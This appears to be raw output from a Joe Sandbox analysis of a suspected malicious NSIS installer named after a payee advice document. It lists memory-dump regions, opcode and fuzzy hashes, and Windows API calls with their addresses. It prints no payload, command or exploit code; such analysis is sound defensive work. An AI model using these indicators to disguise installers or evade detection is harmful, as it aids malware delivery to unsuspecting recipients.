                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 34d31fb6ca9bcfbb43ef4461de9141721162a3748ab85721c716cf46bda769d1
                                                                                                                                          • Instruction ID: 10ccd1b67bbcf12290cc397e1a982941a7b96114bccfc3005278abd31e640574
                                                                                                                                          • Opcode Fuzzy Hash: 34d31fb6ca9bcfbb43ef4461de9141721162a3748ab85721c716cf46bda769d1
                                                                                                                                          • Instruction Fuzzy Hash: 19216B78E00229CFDB64DFA8D984B9DBBB1BF49304F1091A9D909A7351DB30AE85CF40
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 37e843a0ff6b0975f7878dd8fc8df03e51c46bd544e83e91253c0a2743a1c7e9
                                                                                                                                          • Instruction ID: 8a1f0c7cfce44c722dfb85897653c193fb90f0c7786f5d98e1034df2b9c91b04
                                                                                                                                          • Opcode Fuzzy Hash: 37e843a0ff6b0975f7878dd8fc8df03e51c46bd544e83e91253c0a2743a1c7e9
                                                                                                                                          • Instruction Fuzzy Hash: 5F014975B04214AFCB10DB7CE8088CA7BF2EF89361B0101A5E885D7360DA31CC028FA1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3322978565.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_ad000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7a1a2d9f3479678a4f49895f69b5d62c7b977d622d226a875df265cd7dda20fe
                                                                                                                                          • Instruction ID: cb06e4923bd51bf6ceec92b742750b93ef5030a9a4929476707be2342cf7e502
                                                                                                                                          • Opcode Fuzzy Hash: 7a1a2d9f3479678a4f49895f69b5d62c7b977d622d226a875df265cd7dda20fe
                                                                                                                                          • Instruction Fuzzy Hash: 2411D075504244DFCB11CF50D5C4B15BBA1FB45314F24C6AED84A4BA52C33AD84ACF52
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8e055312317b7f0ec0818484c2e707cb1cbf61e76789bef6cc5a5f6ce7c84c71
                                                                                                                                          • Instruction ID: e61ca95f2185eb5eaf8a1b79a2b5a29ddccded7d9659e85b8488ae993c5a5d7d
                                                                                                                                          • Opcode Fuzzy Hash: 8e055312317b7f0ec0818484c2e707cb1cbf61e76789bef6cc5a5f6ce7c84c71
                                                                                                                                          • Instruction Fuzzy Hash: AF01F932B042445BCB059B689C5069E7FA7DBC9750F144055F904D7251CB328F219791
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 372fcdc725381fb8711588ec9de1ec933396349fb3fce754ef30773abee1a048
                                                                                                                                          • Instruction ID: 9e29bf5ff1afabcddf66953cbb5ccd6a571977eed3ccb5eccf2c0768b2dc74b6
                                                                                                                                          • Opcode Fuzzy Hash: 372fcdc725381fb8711588ec9de1ec933396349fb3fce754ef30773abee1a048
                                                                                                                                          • Instruction Fuzzy Hash: 9A019276A00205DFCB50DFA9D9418DEBBF5FF98390B11413BE505D3610E7309A62CB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 804dc00652a9fd04c3e65e8c0120494e6e58592b4b38a37b7e11373243da6288
                                                                                                                                          • Instruction ID: 080d4398555a209bc54bf1a80e2e327681e4942d3d4e58330f95a23c04ed24a0
                                                                                                                                          • Opcode Fuzzy Hash: 804dc00652a9fd04c3e65e8c0120494e6e58592b4b38a37b7e11373243da6288
                                                                                                                                          • Instruction Fuzzy Hash: A401FC356093D4DFC7066B789A2846C3FB6EBCB31171540BBE106CB3A1DA358D82C761
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 384a6a677599ba9e1e426fbea7e2c1589b77f29e77a8dd88ab02b6c8a9853e71
                                                                                                                                          • Instruction ID: 980a6a7c0418a58185033935a4a266d851bddb6486a5c1d32abb43add78b6a75
                                                                                                                                          • Opcode Fuzzy Hash: 384a6a677599ba9e1e426fbea7e2c1589b77f29e77a8dd88ab02b6c8a9853e71
                                                                                                                                          • Instruction Fuzzy Hash: 4801CC31E00209EFDB10AF64DA549AE7BB6FB8D390B01403EE81AA3210D7308A51CFA1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8be75059be2736951cbd150b592fdd480a58ebf74ab4e407de220a309b4e1407
                                                                                                                                          • Instruction ID: 9c30b17e8df406f8839ce5fd11699de02d7e36adbab109907be9f47b4b11daf4
                                                                                                                                          • Opcode Fuzzy Hash: 8be75059be2736951cbd150b592fdd480a58ebf74ab4e407de220a309b4e1407
                                                                                                                                          • Instruction Fuzzy Hash: 11017C36305A008FD704DF29D588E56B7E5FF89769F22847AE14ACB761DA71EC00CB61
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f9cb7bbc464825ba85d172a0d9e55104e2553aad60f9f02b0aefcf72ecd5b423
                                                                                                                                          • Instruction ID: 4605e13cfb0241d88435b28ecd58d7bd0c6c5b26f3cacb5b0146ea916f428a36
                                                                                                                                          • Opcode Fuzzy Hash: f9cb7bbc464825ba85d172a0d9e55104e2553aad60f9f02b0aefcf72ecd5b423
                                                                                                                                          • Instruction Fuzzy Hash: 7D015E35E0025DEFDF549F78D8589AE7BBAFB8C390B004439E91BA3240DB309911CBA1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 90151d60e08759e555c59117b33dc280601d02d2bf8d85576d1eb197a303507c
                                                                                                                                          • Instruction ID: 5af7107926ac16e16dae9a1034a0686d3396250bf01473d292030ef2f2689815
                                                                                                                                          • Opcode Fuzzy Hash: 90151d60e08759e555c59117b33dc280601d02d2bf8d85576d1eb197a303507c
                                                                                                                                          • Instruction Fuzzy Hash: 6A111B74D0424A9FDB01CFA8C8545AEFBB1FF8A305F0041A5D914A3351E7755A16CB91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2f5a0d28e4fe77b7bacf5a3af78154938b374431c386ff5bccabf74a168ba84f
                                                                                                                                          • Instruction ID: a39ac448ca6ee77967925deb0a26e5d1efca528c1f64f8b6078d225b2fc38526
                                                                                                                                          • Opcode Fuzzy Hash: 2f5a0d28e4fe77b7bacf5a3af78154938b374431c386ff5bccabf74a168ba84f
                                                                                                                                          • Instruction Fuzzy Hash: 7EF0BB313006104BC7155A2EDC54A2EB7DEEFC9B553994079E909DB371EF21CC538B91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84d3e859bcce24ba19c05f9be4342cff96aa2e08377440ed7d4af61fab80a375
                                                                                                                                          • Instruction ID: d3adb129bdc8060353760d715f723dfc4c02c57d7b401076566a183f6b985361
                                                                                                                                          • Opcode Fuzzy Hash: 84d3e859bcce24ba19c05f9be4342cff96aa2e08377440ed7d4af61fab80a375
                                                                                                                                          • Instruction Fuzzy Hash: C7F0F632B086108FD7068B28A4249AEBBB6EFC566470650ABE009C7360EB32CC02C790
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b6a35d528c990afb0e1fcd8be6d8b64f742f601809017efdbe2e13aa92db4967
                                                                                                                                          • Instruction ID: 270517b9ff1cb059bbccde4992a3f6a7fc27200285512e5b9b92e85550879a81
                                                                                                                                          • Opcode Fuzzy Hash: b6a35d528c990afb0e1fcd8be6d8b64f742f601809017efdbe2e13aa92db4967
                                                                                                                                          • Instruction Fuzzy Hash: D101E470E04229AFCB54EFB988106AEBBF5AF48200F00816AD559F7250EB3859028F91
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4a2cd14a18bbdb2812d5c03302ec6148e3dbccab2021322bd00490d64418fb63
                                                                                                                                          • Instruction ID: 5d196cd88f5b0481d5ad70850ca6cfeb145bae4d86aeb53ee380a5e10d863c80
                                                                                                                                          • Opcode Fuzzy Hash: 4a2cd14a18bbdb2812d5c03302ec6148e3dbccab2021322bd00490d64418fb63
                                                                                                                                          • Instruction Fuzzy Hash: A4F05E343082149FD748DF29DC64A267BE9BF8675071544E9F505CB3B1DAA0DC01CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353601159.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a800000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a9bdefd7fa02ae2fb428a1431a9fe5f610845b115cfc211da7f6062d86031a3c
                                                                                                                                          • Instruction ID: fa5cf30bc6088580be44b82aee50176b532f8490425fd0d143d2a91752254179
                                                                                                                                          • Opcode Fuzzy Hash: a9bdefd7fa02ae2fb428a1431a9fe5f610845b115cfc211da7f6062d86031a3c
                                                                                                                                          • Instruction Fuzzy Hash: 54F08C343042149FEB48DF2AEC68A2A37AAEFC5B5070584A9F506CB7A0DE60DC01CB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 69a19e883b4e953885399cfd699fb8491ce9345f6a24e3bc27cd95fda2f401d7
                                                                                                                                          • Instruction ID: 0890351fd896717009039e6b8f4af57fea01348f1241ddda509484493d74e6eb
                                                                                                                                          • Opcode Fuzzy Hash: 69a19e883b4e953885399cfd699fb8491ce9345f6a24e3bc27cd95fda2f401d7
                                                                                                                                          • Instruction Fuzzy Hash: 6BF05E36301205DFC700CF6AC488C5ABBEAFF88724751806AF6098B334DB71AC51CB80
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 221ae8e6c5a2c17e647c86e055d572e298f39d1f561adb6a144764050493746f
                                                                                                                                          • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                                                                          • Opcode Fuzzy Hash: 221ae8e6c5a2c17e647c86e055d572e298f39d1f561adb6a144764050493746f
                                                                                                                                          • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: c57873bd80f0b18a7ddfb7471e0f7f9113cd591141a2750083f1c09ea418e3c1
                                                                                                                                          • Instruction ID: d05f8abbdcce3893244e24777515d881a7b217e4be30d250c58940b9ce7547cb
                                                                                                                                          • Opcode Fuzzy Hash: c57873bd80f0b18a7ddfb7471e0f7f9113cd591141a2750083f1c09ea418e3c1
                                                                                                                                          • Instruction Fuzzy Hash: 6CD05B35D6062BD6CB11EBA1EC100DDB334EED5265B548617D53837150EB34275EC7E1
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 294c05485a0350ba7db6ea3c1be5514d24cb3a27a53c42cea2c0e6a2292c8513
                                                                                                                                          • Instruction ID: edefc5568a91d42adb7dc92c7b98baa9d1b9fa4b487429db2bf08cd468929b09
                                                                                                                                          • Opcode Fuzzy Hash: 294c05485a0350ba7db6ea3c1be5514d24cb3a27a53c42cea2c0e6a2292c8513
                                                                                                                                          • Instruction Fuzzy Hash: 93D0C7367151687B4B551A49D4048AE7B6FD7CD7717048026F90A93300CE714D1297D5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0a22e0f0729ad62e643258ed7556d26a2a75733223fefd124ae55c6a0c73d5d7
                                                                                                                                          • Instruction ID: 33eb9f6433674bc3404b393f6531f2a6a9171763e55c1988a8511fb422862908
                                                                                                                                          • Opcode Fuzzy Hash: 0a22e0f0729ad62e643258ed7556d26a2a75733223fefd124ae55c6a0c73d5d7
                                                                                                                                          • Instruction Fuzzy Hash: 68D04275E04109CBCB20DFA8E9844DCBB71EF89321B60546BD925A3651D73059558F11
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d02904eef80a466c5904f3048c7681c202f7671161dc3d895ea3837bd110af5f
                                                                                                                                          • Instruction ID: 6d9054b25e5052d652ad212ab3ca2637521909f60148349945c6f368ca3c1a19
                                                                                                                                          • Opcode Fuzzy Hash: d02904eef80a466c5904f3048c7681c202f7671161dc3d895ea3837bd110af5f
                                                                                                                                          • Instruction Fuzzy Hash: 65D0673AB40018AFCB049F9CEC908DDF776FB98221B048526F915A3261C6319965DB90
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323217994.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_160000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f900f3c0ab8922ae00e733cd5a3a87b44de2f29456af218a80eab6a06c276dd5
                                                                                                                                          • Instruction ID: 7fa0abc01565149169b2ca77a075002c7fce322b25d5f46502cf4b3e5d559052
                                                                                                                                          • Opcode Fuzzy Hash: f900f3c0ab8922ae00e733cd5a3a87b44de2f29456af218a80eab6a06c276dd5
                                                                                                                                          • Instruction Fuzzy Hash: 98C0123000430D4AC745E7A5EC55555B72BA7802147708950B4060696AEEB81D964B90
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                          • String ID: $M$N
                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                          • Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                                          • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                          • Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                                          • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                                                                          APIs
                                                                                                                                          • #17.COMCTL32 ref: 00403379
                                                                                                                                          • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                            • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                                                          • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                                                                          • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                                                                          • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                                                                          • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                                                                          • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                                                                          • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                          • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                                                                          • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                                                                          • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                                                                          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                          • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                                                                          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                          • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
